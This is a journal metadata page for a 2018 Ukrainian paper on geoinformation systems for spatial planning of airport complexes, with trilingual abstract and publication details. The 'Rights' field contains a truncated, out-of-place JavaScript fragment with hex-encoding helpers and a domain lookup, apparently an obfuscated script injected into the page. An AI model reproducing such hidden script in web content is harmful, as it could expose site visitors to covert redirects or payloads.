Запис Детальніше

Передумови впровадження комплексних геоінформаційних систем для просторового планування аеропортових комплексів

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Передумови впровадження комплексних геоінформаційних систем для просторового планування аеропортових комплексів
Предпосылки внедрения комплексных геоинформационных систем для пространственного планирования аэропортовых комплексов
PREREQUISITES FOR THE INTEGRATED GEOINFORMATION SYSTEMS IMPLEMENTATION FOR SPATIAL PLANNING OF AIRPORT COMPLEXES
 
Creator Boyko, Olena; National Aviation University
Prusov, Dmytro; Kiev National University of Construction and Architecture
 
Subject
аеропорт; пасажиропотік; геоінформаційна система (ГІС); просторове планування
528.9: 711.77

аеропорт; пассажиропоток; геоинформационная система (ГИС); пространственное планирование
528.9:711.77

airport; passenger traffic; geoinformation system (GIS); spatial planning
528.9:711.77
 
Description Проаналізовано можливості впровадження комплексних геоінформаційних систем для просторового планування аеропортових комплексів на основі дослідження активності аеропортів України, їх пасажиропотоку за останнє десятиріччя. Пасажиропотік є одним з вагомих факторів та передумовою впровадження в аеропортах України геоінформаційних систем, які використовуються для моніторингу стану об’єктів, будівель, території, прийнятті управлінських рішень, плануванні та реконструкції, тощо.
Проанализированы возможности внедрения комплексных геоинформационных систем для пространственного планирования аэропортовых комплексов на основе исследования активности аэропортов Украины, их пассажиропотока за последнее десятилетие. Пассажиропоток является одним из весомых факторов и предпосылкой внедрения в аэропортах Украины геоинформационных систем, которые используются для мониторинга состояния объектов, зданий, территории, принятии управленческих решений, планировании и реконструкции, и тому подобное.
In the article the implementation possibilities of complex geographic information systems have been analyzed for spatial planning of airport complexes on the basis of research on the activity of Ukrainian airports, their passenger traffic over the last decade. Passenger traffic is one of the important factors and a prerequisite for the introduction at the airports of Ukraine of geoinformation systems that are used to monitor the state of objects, buildings, territory, management decisions, planning and reconstruction, etc.
 
Publisher National Aviation University
 
Contributor


 
Date 2019-04-02
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13496
10.18372/2306-1472.77.13496
 
Source Proceedings of the National Aviation University; Том 77, № 4 (2018); 39-46
Вестник Национального авиационного университета; Том 77, № 4 (2018); 39-46
Вісник Національного Авіаційного Університету; Том 77, № 4 (2018); 39-46
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).